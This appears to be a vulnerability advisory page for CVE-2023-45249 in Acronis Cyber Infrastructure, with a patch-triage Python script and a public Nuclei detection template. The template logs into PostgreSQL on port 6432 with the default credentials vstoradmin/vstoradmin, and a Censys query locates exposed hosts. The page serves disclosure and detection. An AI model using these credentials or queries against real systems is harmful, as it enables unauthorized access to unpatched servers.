CVE-2023-45249: Acronis Cyber Infrastructure - Default Password

Date: 2025-08-01 | Affected software: Acronis Cyber Infrastructure | PoC: public

Vulnerability description

Acronis Cyber Infrastructure (ACI) before build 5.0.1-61, 5.1.1-71, 5.2.1-69, 5.3.1-53, and 5.4.4-132 contains a remote command execution vulnerability caused by the use of default passwords, letting attackers execute arbitrary commands remotely. Exploitation requires access to the system with the default credentials.
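The fixed builds in the description are one per release branch, so patch triage comes down to comparing an installed build against the fixed build of its own branch. The following is an added example (not code from the page or from Acronis) that does this for an inventory of hosts; it assumes builds follow the major.minor.patch-build form seen in the advisory, that branches are keyed by major.minor, and that a branch not listed in the advisory is reported as unknown rather than guessed.

```python
import re
from typing import Dict, List, Optional, Tuple

# Fixed builds taken from the advisory text, keyed by release branch
# (major, minor). Any build on a branch that sorts below the fixed build
# is treated as affected (assumption: branches are grouped by major.minor).
FIXED_BUILDS: Dict[Tuple[int, int], Tuple[int, int, int, int]] = {
    (5, 0): (5, 0, 1, 61),
    (5, 1): (5, 1, 1, 71),
    (5, 2): (5, 2, 1, 69),
    (5, 3): (5, 3, 1, 53),
    (5, 4): (5, 4, 4, 132),
}

BUILD_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)-(\d+)$")


def parse_build(build: str) -> Tuple[int, ...]:
    """Parse an ACI build string such as '5.3.1-53' into a comparable tuple."""
    m = BUILD_RE.match(build.strip())
    if not m:
        raise ValueError(f"unrecognised ACI build string: {build!r}")
    return tuple(int(x) for x in m.groups())


def is_affected(build: str) -> Optional[bool]:
    """True if the build is below the fixed build for its branch, False if it
    is at or above it, None if the branch is not listed in the advisory."""
    v = parse_build(build)
    fixed = FIXED_BUILDS.get((v[0], v[1]))
    if fixed is None:
        return None
    return v < fixed


def triage(builds: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Bucket (hostname, build) pairs into affected / fixed / unknown."""
    result: Dict[str, List[str]] = {"affected": [], "fixed": [], "unknown": []}
    for host, build in builds:
        status = is_affected(build)
        key = "unknown" if status is None else ("affected" if status else "fixed")
        result[key].append(host)
    return result


if __name__ == "__main__":
    # Constructed sample inventory; hostnames and builds are not real systems.
    inventory = [
        ("aci-01.example.test", "5.3.1-50"),
        ("aci-02.example.test", "5.3.1-53"),
        ("aci-03.example.test", "5.4.3-200"),
        ("aci-04.example.test", "5.5.0-10"),
    ]
    for bucket, hosts in triage(inventory).items():
        print(f"{bucket}: {', '.join(hosts) or '-'}")
```

A build that is at or above the fixed build still needs the default password changed, as the template's remediation note says; the version check only tells you whether the vendor fix is in place.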

PoC code [public]

id: CVE-2023-45249

info:
  name: Acronis Cyber Infrastructure - Default Password
  author: darses
  severity: critical
  description: |
    Acronis Cyber Infrastructure (ACI) before build 5.0.1-61, 5.1.1-71, 5.2.1-69, 5.3.1-53, and 5.4.4-132 contain a remote command execution caused by use of default passwords, letting attackers execute arbitrary commands remotely, exploit requires access to the system with default credentials.
  impact: |
    Attackers can execute arbitrary commands remotely, potentially leading to full system compromise.
  remediation: |
    Change default passwords and update to the latest version.
  reference:
    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
    - https://security-advisory.acronis.com/advisories/SEC-6452
    - https://security-advisory.acronis.com/updates/UPD-2310-9e7e-bd9b
    - https://www.securityweek.com/acronis-product-vulnerability-exploited-in-the-wild/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-45249
    cwe-id: CWE-1393,CWE-287
    epss-score: 0.93019
    epss-percentile: 0.9977
    cpe: cpe:2.3:a:acronis:cyber_infrastructure:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: acronis
    product: cyber_infrastructure
    censys-query: services.http.response.html_title:"Acronis Cyber Infrastructure" and services.port:6432
    max-requests: 1
  tags: cve,cve2025,kev,acronis,network,js,postgresql,default-login,vkev

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);

    code: |
      const postgres = require('nuclei/postgres');
      const client = new postgres.PGClient;
      connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT release_notes_url FROM software_info");
      Export(connected);

    args:
      Host: "{{Host}}"
      Port: 6432

      User: "vstoradmin"
      Pass: "vstoradmin"
      Db: "vstoradmin"

    matchers:
      - type: dsl
        dsl:
          - "success == true"
          - "contains_all(response, 'release_notes_url','http://download.acronis.com/vstorage/')"
        condition: and
# digest: 4a0a00473045022100da9fd54e2c17a349b1032b7a7497ee3f26d4bb4c518c70c8eb36150d9e520ab002203c3df588e15f9e04988263cf6a01cbd5b4aa8c8f3306072fe32e4284b38626cc:922c64590222798bb761d5b6d8e72950